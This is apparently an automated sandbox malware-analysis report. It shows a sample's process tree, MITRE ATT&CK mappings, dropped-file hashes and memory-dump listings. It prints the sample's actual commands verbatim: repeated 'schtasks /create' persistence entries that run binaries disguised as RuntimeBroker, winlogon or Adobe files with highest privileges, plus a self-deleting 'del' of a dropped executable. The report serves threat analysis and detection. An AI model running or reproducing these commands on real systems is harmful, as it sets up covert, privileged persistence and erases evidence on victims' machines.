        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\B5GxaJWFI4.bat"
        31⤵
        
        PID:2456
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        32⤵
        
        PID:1676
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        32⤵
        
        PID:3184
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        32⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2788
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Q8sISb3ARb.bat"
        33⤵
        
        PID:2044
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        34⤵
        
        PID:2204
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        34⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4080
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        34⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4780
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1ssuaX7045.bat"
        35⤵
        
        PID:2824
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        36⤵
        
        PID:3272
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        36⤵
        
        PID:228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe
  2⤵
  PID:2580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Templates\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Default\Templates\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Templates\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Program Files\Java\jre-1.8\lib\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\lib\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files\Java\jre-1.8\lib\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "privatep" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\private.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "private" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\private.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "privatep" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\private.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "privatep" /sc MINUTE /mo 5 /tr "'C:\Windows\apppatch\en-US\private.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "private" /sc ONLOGON /tr "'C:\Windows\apppatch\en-US\private.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "privatep" /sc MINUTE /mo 13 /tr "'C:\Windows\apppatch\en-US\private.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 8 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chainreviewwinrefSvc" /sc ONLOGON /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 10 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat

Filesize
98B

MD5
4dafd9e9509ac96be6aa5baec659da4d

SHA1
a091552663ddea89536560f232b8339f318c9cbc

SHA256
0c53b640295abd25e8387957941e29f5c4e765376365409164ac39e3365a6ccf

SHA512
d290c162347e236e0e197c52afc4f4b33f1eba2498dfe2ad86c414c87ab70c9fbbd2132cd08bfb4137e8555a095ca9acb6675727a4a5f65ccc46141c16698132

Download Submit
C:\ComponentCrt\chainreviewwinrefSvc.exe

Filesize
1.8MB

MD5
11cca9e2c6dc9c2a728b89e7314ec26a

SHA1
58aec3b662a1c4e8b43cc454d90813ac89b5e612

SHA256
300072795259e7b2baa69a7a3d19ffea1844dffc391e710c654aa1b66b0e2197

SHA512
fb1fcff1c94e73b1227f65b237639e25604d614cfe365f2108bbbfdb489b97410fdc17411b8f00fc5b8f57d51080b4496010537a6a4ff9b15b7bdd24f89d0df7

Download Submit
C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe

Filesize
207B

MD5
b292d233456b16f26abc1aa07c9f5de0

SHA1
7b025705136101b5618d81d8ebf472335eebde43

SHA256
e75d13d4b079fafbd413fa8182c270f1f0f41b1b19b3469db12de226fed67b2d

SHA512
1c9c3846ab0e392dc6833de2a9238c91b6042b5095521196a3ceae8830edf7fb6d73118ed023b2e2daf287a48084fa8ee40241248a231cf668d5cc5e8f947ee4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chainreviewwinrefSvc.exe.log

Filesize
1KB

MD5
af6acd95d59de87c04642509c30e81c1

SHA1
f9549ae93fdb0a5861a79a08f60aa81c4b32377b

SHA256
7521ee2d065a78efcab55a194fbd78492f84b70595f139263875f4ea92b194d6

SHA512
93ab99bcf588fde553de3240e0d2b0cbd4e4bc5ef5e99d53f45a267d7ff30103a80b5a7aa1c52d6eff1e070af0ec82d2c0b8aafb7099742aa16810edc1815c3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\1ssuaX7045.bat

Filesize
216B

MD5
14eb32f6173834145d85559a664b4503

SHA1
a375fb3649de1d851f46457f6569518ee03c287d

SHA256
737ad1c05f604ee6036dea0ef38cb82e29f03964d0b607e80ab2b9ff558117fc

SHA512
0ad5cc7844b1a6dda38cd888e8a44544bce6b94cdce5e405e06847b638dc44c9708d844b717a3bd99d256a614c430bd623b97bb2469c19baa29424b412805e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\26i24I6rG0.bat

Filesize
216B

MD5
88e0c7c0eca3882804c45ceb4f9b850b

SHA1
fffcfeea217bfa2aca28f0ed8d7e03fc8b0f0ffe

SHA256
5a241dbd7e49d67f666b2aa92fd9956dbbfb7fd1c08fc106b6307c7d604e67b3

SHA512
178ca49b684d6811806234389c67e05f16c7e43554f548a07561d227e14837dfc4da5217f19dee85645c1622b606e7dfe889a6f01d3da2c8ed3aa932feb6bb00

Download Submit
C:\Users\Admin\AppData\Local\Temp\5Fkn6foGzf.bat

Filesize
168B

MD5
d8a77fb7752ad12fe87f59212c90de28

SHA1
d6a0a4c3ff1a40c0120bea76b4e2835af8b341fd

SHA256
89937c5d6cde236711f7048b8e4ea6e74807ebf3b459da7053d5826d2997df17

SHA512
01bf3a2df331da786abb968c162b36f69c15e2e0c98816c11995315aace73052f14aee53de52c4d0d18b3c9977e9db1fee231ebf57a1f6074ae1c2cc9c2653ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\B5GxaJWFI4.bat

Filesize
216B

MD5
386df07d49d4c3624b39e9b42e9e9e41

SHA1
f4a52b3ddae2779c9adbb33be8fd80a0a566af40

SHA256
424208d1d376fe743d33d05c6b35bc2dc10ca9f7e92308a2ba8c08cd41dcbe1f

SHA512
bac7fecc183ef11df567a5c52706751d342c61fb5144242c0cda14c61c0cc506b7525cc945ea7534d74ef0e9faa3d1af0987d1f47ff2bb3e224805cc54e95891

Download Submit
C:\Users\Admin\AppData\Local\Temp\DK6554V6Uz.bat

Filesize
168B

MD5
6bb90b4e0bb2dc4b03914d6519a4c80a

SHA1
807b803e1dba4728a6443e66fdc16cdddf685cc3

SHA256
416ac3a07ad66da9dceca41d4577ae11b540a8862f6d740c20d150aa03db2b40

SHA512
9ebfc70de4306aad3eefbfe9c562cc6da5a9fa0914972cc037ec08c4a4cff01b51e4aa8ad883e16943d03b510566d1c1cf670f5281aafaaa9806047b2d7b56f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\GogtzRNUlL.bat

Filesize
168B

MD5
03ba2e9542fbe771f78f7a420e190246

SHA1
5b0f701881fc1545f8ba34e844a446914842a417

SHA256
5ddd0207235d2c654a99c12b304025b397edab500e95b934e9ff12ecd0988a0f

SHA512
ae6e42681708260a0634d9ee3f1088fd04de857f67713be6f82bccdfb5fbe95b93a75426493dbc02b95a0da32b35bfb45d155fa17e074160cfe8e986d0a877b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\OEffu0Lctr.bat

Filesize
168B

MD5
e90b3dd0202984c59e18c147b7830f36

SHA1
44d85be7ec31341671244499e4550fb49411ece8

SHA256
b0b130994ec400a88e26406bc446d40f495b37025842fc768c87c0a0a6edb465

SHA512
007637bdc5f062016b1c61e8f93561a0b29c58cec8ce3b0e78cb209eccbd6ff6a26979c08cbbcee56a28a6f87ab7a09c561a6af96ea224a6c641aa8458a331b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ot2Axq4KFg.bat

Filesize
168B

MD5
69ba977aa115879ac3cf05e2dfff574a

SHA1
d241acc83b799901c5aa5e848eb2e6936b28e866

SHA256
6a848f5731cff9a39c6575f3e8baeef115b03342782ed1445f7bbc5a8671902e

SHA512
7960316c0c2317f2116b8259cc66fc4b2045e4e6a9c9afdd2a3aed4a8ba455cfcf3596426cb3b6b193ae33da1eb1d143a9ec66148ba65a0f66ab0ca10bf4fcd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Q8sISb3ARb.bat

Filesize
168B

MD5
bcfe644b948bb93cca4db61ddad40f4b

SHA1
90c31e967924eb6510db064aff745e17fb200ef9

SHA256
05590577a05f8e4cf69945c915665d017f0e0d15d81b42be39bcef44f36219e1

SHA512
c4ea6a414d4dd5917ee25f6e73cb0c93b42e0af0d753710ca8a7664841edfff0e309696e83f9a0d9f8547023da6e3a630156683134930a645cb0ddb4a87f5665

Download Submit
C:\Users\Admin\AppData\Local\Temp\S4EXwJDwzg.bat

Filesize
168B

MD5
bd67b3f3bcfd0710f5873729a9073d1c

SHA1
a31603b749dfa8f01ff3b9192339894d00336af0

SHA256
a1223a04da5047349c161d06ba256a5b09d11e38a633287c5c92d1b87c0dba2a

SHA512
40812860a5565597646f4da1318b913b790f678a40a0de323bec3316564d83565dbfe68107acd707d571d173b054f64a8653b835a421ffea3b1251ef58711e62

Download Submit
C:\Users\Admin\AppData\Local\Temp\XKxUoGu8Hi.bat

Filesize
216B

MD5
feedf478c4e0c0afc84ea4edd61096ff

SHA1
5f0e6be393ee1a4945441d7a529973e68afbcbb0

SHA256
6f02a95f51ffefa9a33f0621db9e6a15268d855d103f58dd74144b0063f5b0c3

SHA512
282dae8fa68d88349d7b3d503b713086cbb09f7bfb590e1682c035ab202e5ee49fa874cc6a0715380d69010ebadbbb998dd6fbb33e388f62dbe5802f92c4b5e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\fPImnfbxm2.bat

Filesize
216B

MD5
7c1a2c49c758e16514a098253bf0aa3c

SHA1
32f995a41141efcf3fe5fc1438c9d1eb93f4620e

SHA256
39359eb617d49a75f680c7c5dece00379e2ae75ffaea43a91a9326886670562a

SHA512
72c038db4b22ed9442c957c0cc3ef06c4070336c00865be701c72fa9a2b81ab35f43978924739594dff3183ae20248da7fc1d8f0410b7a7d65334b1a65cf1d35

Download Submit
C:\Users\Admin\AppData\Local\Temp\htx2mBafAs.bat

Filesize
168B

MD5
44c7f8199cbaa26b507a6b8159ca66ba

SHA1
dd988588ce45dc167912e2316a1a2baba53f228c

SHA256
0f89af5f98e60c63950004064b05d15a45e0a83f932cb1b8ea71d3018725855b

SHA512
cbea18517c2d06dacaba46ba314ebbffbe635814a2844d160f0ad30a167da750deb93eada0126a94d26c0dc2640ffca26fc251965e2e5071bd3bf437a40358d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ojUBGqHdSI.bat

Filesize
168B

MD5
c175709aff00bbeb3d376c4e829a0be1

SHA1
31e828d157976f0112c99801a9b1994d7f673b70

SHA256
a2affc2bce9e7ecccdd6d4ad02c815112a13a74cf4edc0982cf4326c71d94d8a

SHA512
a60ea0595037897b3f8d7e74c8c47fa93914ef3ed43bee7556b8357a7d17f213a036956b5112ecb59e501c24bc5ff2e039a5f80d61503f53e27cf8c5683b58bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\rC9RFMHLq8.bat

Filesize
216B

MD5
86153fc9e16733b8f9bf343c0f407d90

SHA1
d206caeaafd74ada3c4763a9543ba944873ac623

SHA256
07cf76685f7c0c1830015c0426a9e287f214f04736324140cd35d53271994dcb

SHA512
e4eebf2c2cddfedfebd828f06adbdc98a80c5c7a1ce3bb18e7c8c919ecc1ad5a7e652331c7c0ae7edf31c181109237fed468797b9671399c543f3703fe3cf2b2

Download Submit
C:\Windows\Speech\client.exe

Filesize
2.1MB

MD5
bf4f13d82d217ed69d80124c50d9441c

SHA1
b7ee7d109f61371342e924e6a0c3505347dd318f

SHA256
51890bfc6f223014ff16f4bfa6ace8e2d2ec3c81eb6965406813b9ca32b08508

SHA512
1ba17e55d6d1f6fda99daffe3f11f995d5e8434901b2aea9105728ccbff1b81727d96bf8811a62e8367fca0ec23bdea331165b001088b183281164269668d2f4

Download Submit
memory/1464-154-0x000000001CE10000-0x000000001CEB9000-memory.dmp

Filesize
676KB

Download
memory/1508-77-0x000000001CEE0000-0x000000001CF89000-memory.dmp

Filesize
676KB

Download
memory/2084-121-0x000000001CF60000-0x000000001D009000-memory.dmp

Filesize
676KB

Download
memory/2192-55-0x000000001CA10000-0x000000001CAB9000-memory.dmp

Filesize
676KB

Download
memory/2540-143-0x000000001C9A0000-0x000000001CA49000-memory.dmp

Filesize
676KB

Download
memory/2788-187-0x000000001CD10000-0x000000001CDB9000-memory.dmp

Filesize
676KB

Download
memory/2856-165-0x000000001CC80000-0x000000001CD29000-memory.dmp

Filesize
676KB

Download
memory/2880-176-0x000000001AF60000-0x000000001B009000-memory.dmp

Filesize
676KB

Download
memory/2948-88-0x000000001C120000-0x000000001C1C9000-memory.dmp

Filesize
676KB

Download
memory/3184-66-0x000000001CE20000-0x000000001CEC9000-memory.dmp

Filesize
676KB

Download
memory/3292-110-0x000000001C860000-0x000000001C909000-memory.dmp

Filesize
676KB

Download
memory/4676-132-0x000000001BDA0000-0x000000001BE49000-memory.dmp

Filesize
676KB

Download
memory/4780-198-0x000000001CD00000-0x000000001CDA9000-memory.dmp

Filesize
676KB

Download
memory/4796-99-0x000000001C310000-0x000000001C3B9000-memory.dmp

Filesize
676KB

Download
memory/4868-25-0x0000000002750000-0x000000000275C000-memory.dmp

Filesize
48KB

Download
memory/4868-42-0x000000001B1D0000-0x000000001B279000-memory.dmp

Filesize
676KB

Download
memory/4868-23-0x0000000002790000-0x00000000027A8000-memory.dmp

Filesize
96KB

Download
memory/4868-21-0x000000001B0D0000-0x000000001B120000-memory.dmp

Filesize
320KB

Download
memory/4868-20-0x0000000002770000-0x000000000278C000-memory.dmp

Filesize
112KB

Download
memory/4868-18-0x0000000002740000-0x000000000274E000-memory.dmp

Filesize
56KB

Download
memory/4868-43-0x000000001BE00000-0x000000001BFA9000-memory.dmp

Filesize
1.7MB

Download
memory/4868-16-0x0000000000350000-0x000000000052A000-memory.dmp

Filesize
1.9MB

Download